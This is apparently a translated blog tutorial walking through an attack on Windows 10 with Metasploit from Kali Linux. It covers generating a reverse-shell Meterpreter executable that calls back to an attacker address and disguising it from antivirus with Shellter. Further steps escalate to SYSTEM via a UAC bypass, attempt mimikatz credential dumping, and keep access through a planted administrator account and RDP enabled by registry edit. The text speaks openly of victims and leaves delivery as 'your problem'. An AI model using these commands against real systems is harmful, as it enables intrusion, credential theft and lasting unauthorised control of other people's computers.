Attack on Windows 10 with Metasploit on Kali Linux

In this article we will see how we can get on Windows 10 with Kali Linux and more specifically with Metasploit. We have talked about how Metasploit works at past. We have already installed in machine Windows 10 and we will try to gain access with an infected .exe file.

Create an infected .exe file

To create the executable .exe file, open your terminal and type the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 – windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

So we will create a payload for Windows 10 machine, for 32-bit architecture.

To get our IP address, we use the ifconfig command inside Kali, defining the interface as eth0 (since we are on Ethernet):

 

The following screenshot shows the results of the command for the successful creation of the .exe file:

 

The next step is to make the executable .exe file we created, undetectable by security programs.

Making the FUD executable file

To make our file undetectable, we will use Shellter . Shellter simply changes the executable file signatures from a malicious to a completely new and unique file that can bypass its detection by Antivirus.

In Kali Linux, download Shellter with the following command:

sudo apt-get install shellter

To run Shellter, just type shellter in your terminal.

You will be prompted to enter the path to the executable file to make it FUD. Make sure you select the "Auto" mode as shown below.

 

Shellter will then perform some checks and ask you if you want to perform the operation . Select "Y" for yes.

 

The next message that will appear will ask you to enter the payload and here we will put the file we made at the beginning with Msfvenom. You should select a list by typing “L” if you want to go ahead with your own custom payload. Select the payload to use. We now need a Meterpreter_Reverse_TCP, so we should follow option “1”

 

Type LHOST and LPORT and press Enter. Shellter will complete the process and ask you to press Enter.

 

At this point, our file has become undetectable by all antivirus and other security programs.

You could buy your own crypter that is constantly being upgraded and remains undetectable in the long run. Shellter will keep your file hidden for a while but at some point it will be added to the program lists and detected by antivirus.

Now we need to create a listener on the port we specified inside the executable file. We do this with Metasploit, using the msfconsole command on the Kali Linux terminal.

The following screenshot shows which commands to use in Metasploit. First, we will tell Metasploit to use the general payload handler "multi / handler" using the use multi / handler command. Next, we will configure the payload to match what is inside the executable file, using a set of payload commands windows / meterpreter / reverse_tcp. Next we will set LHOST and LPORT to the way we set LHOST 192.168.100.4 and LPORT 4444. When done, type “run” or “exploit” and press Enter.

If everything goes well, you will see the following screenshot. The reverse handler will have to wait for a connection.

 

The next step is to run the Windows executable file. How you serve it in a real attack on your victim is your problem and something we will not analyze now because we have already done it in the past…

Execution of Payload

So we transfer our file to Windows and run it.

 

Our file currently causes the payload to run and creates a connection to our attack machine (Kali Linux). Immediately, we get a Meterpreter session on Kali Linux. This is proved by Meterpreter message> as shown below:

 

Since the file was not executed as an "administrator", there are Meterpreter commands that cannot be executed as they would lead to an "access denied" response. This can be confirmed by running the getuid command, which tells us that we are running it as a l3s7r0z user.

 

To prove that the user does not have enough privileges, we tried to run the command mimikatz_command -f sekurlsa :: logonPasswords.

The result is a "Access is denied" message, as shown below:

 

To gain sufficient rights, we must bypass UAC. In the next step, we will see how this can be done.

privilege escalation

The privilege escalation allows us to increase the privileges or rights (if you prefer) from a less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, who has all the administrator rights.

Metasploit by default provides us with some methods that allow us to increase our privileges. In the Meterpreter command line, we use the getsystem command, as shown below:

 

Since all the methods used by the getsystem fail, we need an alternative method to increase our privileges.

We will use the comhijack exploit module to bypass user access control.

To do this, we leave our Meterpreter session in the background, change our exploit from multi / handler to windows / local / bypassuac_comhijack and apply this to the session we have in the background, using the SESSION 2 set.

 

 

Subsequently, we defined our payload in windows / x64 / meterpreter / reverse_tcp, LPORT and LHOST. Then we execute our exploit.

 

We successfully received a Meterpreter session. We can type "sysinfo" to see information about our target. Getuid shows us that we work as a l3s7r0z user in Windows 10, but we can upgrade to a SYSTEM user by running "getsystem".

We can see that our change was successful and we can confirm it by running the "getuid" command again. We can see that we are now NT AUTHORITYSYSTEM.

 

At this point we have full access to windows, we can get whatever data we want, like of access, various files that interest us, etc.

P

We will now see how we maintain the access we have to our victim even when the target decides to correct the vulnerability.

We will achieve this by activating RDP. In simple words we will have our own account within the target and we will activate the RDP so that whenever we want, we can connect to the machine and access the information we want.

In the Meterpreter session, we open the command to upload a Windows shell to our target (Windows 10).

 

In line C: WINDOWSsystem32>, we give the command net users. This lists all windows users. As we can see, there are only two users, the Administrator and the user l3s7r0z.

We add a new user Jaime and give him the access Bru73f0rc3_

The command used to do this is:

net user / add jaime Bru73f0rc3_

We then add Jaime to the group of administrators so that the account can perform administrator functions. The command we use is:

net localgroup administrators jaime / add

Then we add it to the RDP group. This will allow us to connect via RDP to the machine, even after the vulnerability has been fixed by antivirus programs.

The command we use is:

net localgroup “Remote Desktop Users” jaime / add

Once the configuration for Jaime is complete, we can use the following command to see the properties of the user:

net user jaime

The following snapshot shows the results of the command.

 

In some cases, RDP is not enabled on the victim machine. While we are in the shell, we can activate it by adding a registry key.

To enable RDP, use the following command:

reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f

If you want to disable RDP for any purpose, you can do so by typing the following command:

reg add “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server” / v fDenyTSConnections / t REG_DWORD / d 1 / f

The result of the operation is shown below:

 

From Kali Linux, we can use the remmina remote client. If it is not installed in Kali, you can install it by typing the following command:

apt-get install remmina

Start remmina by typing remmina at the command prompt and logging in to the target using its IP address.

 

You will be asked to accept a certificate. Do this and use the username and password you used to register your Jaime account. This is:

Username: jaime

Password: Bru73f0rc3_

By default in Windows 10, the logged in user using Windows 10 will be required to allow you to sign in. However, if they do not respond within 30 seconds, they are automatically disconnected.

 

 

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).